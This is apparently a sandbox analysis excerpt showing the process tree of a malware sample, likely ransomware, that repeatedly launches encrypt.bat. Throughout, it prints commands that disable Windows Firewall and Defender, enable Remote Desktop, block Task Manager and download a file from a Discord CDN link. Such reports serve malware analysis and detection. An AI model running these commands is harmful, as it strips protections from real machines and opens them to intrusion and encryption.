C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE42⤵PID:4048
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off42⤵PID:1708
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off42⤵PID:2844
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off42⤵PID:3588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off42⤵PID:4772
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off42⤵PID:1288
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"42⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"42⤵PID:2760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"42⤵PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"42⤵PID:4868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"42⤵PID:344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"42⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"42⤵
- Blocklisted process makes network request
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"42⤵
- Command and Scripting Interpreter: PowerShell
PID:4888 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"43⤵PID:1152
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"44⤵PID:716
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f44⤵PID:1984
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"44⤵PID:1920
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f44⤵PID:1524
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:1564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:1124
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:1944
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable44⤵PID:1288
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE44⤵PID:4392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off44⤵PID:3156
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off44⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off44⤵PID:3080
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off44⤵PID:1360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off44⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"44⤵PID:2236
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"44⤵PID:2192
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"44⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"44⤵PID:528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"44⤵PID:2640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"44⤵PID:1120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"44⤵
- Blocklisted process makes network request
PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"44⤵
- Command and Scripting Interpreter: PowerShell
PID:2352 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"45⤵PID:4392
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"46⤵PID:4216
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f46⤵PID:2572
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"46⤵PID:1472
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f46⤵PID:4732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:4352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:4448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:1076
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:376
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:1152
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable46⤵
- Modifies Windows Firewall
PID:4240
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE46⤵PID:4532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off46⤵PID:3412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off46⤵PID:3000
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off46⤵PID:400
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off46⤵PID:924
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off46⤵PID:3160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"46⤵PID:3052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"46⤵PID:4568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"46⤵PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"46⤵PID:996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"46⤵PID:1428
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"46⤵PID:2948
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"46⤵
- Blocklisted process makes network request
PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"46⤵
- Command and Scripting Interpreter: PowerShell
PID:1360 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"47⤵PID:4012
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"48⤵PID:2844
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f48⤵PID:1864
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"48⤵PID:1472
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f48⤵PID:4272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:2732
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:3876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:1652
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:3520
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable48⤵
- Modifies Windows Firewall
PID:3372
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE48⤵PID:2520
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off48⤵PID:4396
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off48⤵PID:4404
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off48⤵PID:3680
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off48⤵PID:4700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off48⤵PID:560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"48⤵PID:4436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"48⤵PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"48⤵PID:1920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"48⤵PID:1876
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"48⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"48⤵PID:96
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"48⤵
- Blocklisted process makes network request
PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"48⤵
- Command and Scripting Interpreter: PowerShell
PID:3636 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"49⤵PID:2912
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"50⤵PID:3680
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f50⤵PID:2392
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"50⤵PID:920
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f50⤵PID:3864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:1760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:2992
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:204
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:1572
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable50⤵PID:1888
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE50⤵PID:5060
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off50⤵PID:1512
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off50⤵
- Modifies Windows Firewall
PID:4888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off50⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off50⤵PID:4392
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off50⤵PID:2188
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"50⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"50⤵PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"50⤵PID:996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"50⤵PID:1616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"50⤵PID:344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"50⤵PID:3580
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"50⤵
- Blocklisted process makes network request
PID:196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"50⤵
- Command and Scripting Interpreter: PowerShell
PID:3708 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"51⤵PID:3316
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"52⤵PID:4328
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f52⤵PID:4280
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"52⤵PID:3056
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f52⤵PID:688
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:3156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:4740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:1600
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:2336
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable52⤵PID:4768
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE52⤵PID:348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off52⤵PID:2324
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off52⤵PID:4388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off52⤵PID:4872
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off52⤵PID:608
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off52⤵PID:1916
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"52⤵PID:3608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"52⤵PID:1004
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"52⤵PID:4772
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"52⤵PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"52⤵PID:4388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"52⤵PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"52⤵
- Blocklisted process makes network request
PID:804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"52⤵
- Command and Scripting Interpreter: PowerShell
PID:4256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"53⤵PID:344
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"54⤵PID:1120
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f54⤵PID:4516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"54⤵PID:1300
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f54⤵PID:716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:1348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵PID:608
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:2612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:2352
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵PID:4856
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable54⤵PID:1124
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE54⤵
- Modifies Windows Firewall
PID:1804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off54⤵PID:1348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off54⤵PID:1360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off54⤵PID:3596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off54⤵PID:4888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off54⤵PID:196
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"54⤵PID:1704
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"54⤵PID:2816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"54⤵PID:3680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"54⤵PID:828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"54⤵PID:3440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"54⤵PID:4536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"54⤵
- Blocklisted process makes network request
PID:4892
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"54⤵PID:3144
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"55⤵PID:2236
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"56⤵PID:5072
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f56⤵PID:4516
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"56⤵PID:4908
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f56⤵PID:4604
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:4160
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:4108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵PID:3120
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode disable56⤵PID:4448
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=DISABLE56⤵PID:4148
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off56⤵PID:920
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set domainprofile state off56⤵PID:168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set privateprofile state off56⤵PID:2960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off56⤵PID:4760
-
-
C:\Windows\system32\netsh.exenetsh advfirewall set allprofiles state off56⤵PID:2032
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"56⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"56⤵PID:2436
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"56⤵PID:4768
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"56⤵PID:1244
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"56⤵PID:1476
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"56⤵PID:4640
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&', 'C:\Users\Admin\Desktop\kill.jpg')"56⤵
- Blocklisted process makes network request
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"56⤵
- Command and Scripting Interpreter: PowerShell
PID:396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"57⤵PID:3128
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"58⤵PID:1864
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f58⤵PID:1912
-
-
C:\Windows\system32\reg.exereg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"58⤵PID:2872
-
-
C:\Windows\system32\reg.exereg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f58⤵PID:2264
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"58⤵PID:1560
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableIOAVProtection $true"58⤵PID:4760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableScriptScanning $true"58⤵PID:2964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableEmailProtection $true"58⤵PID:2292
-
-
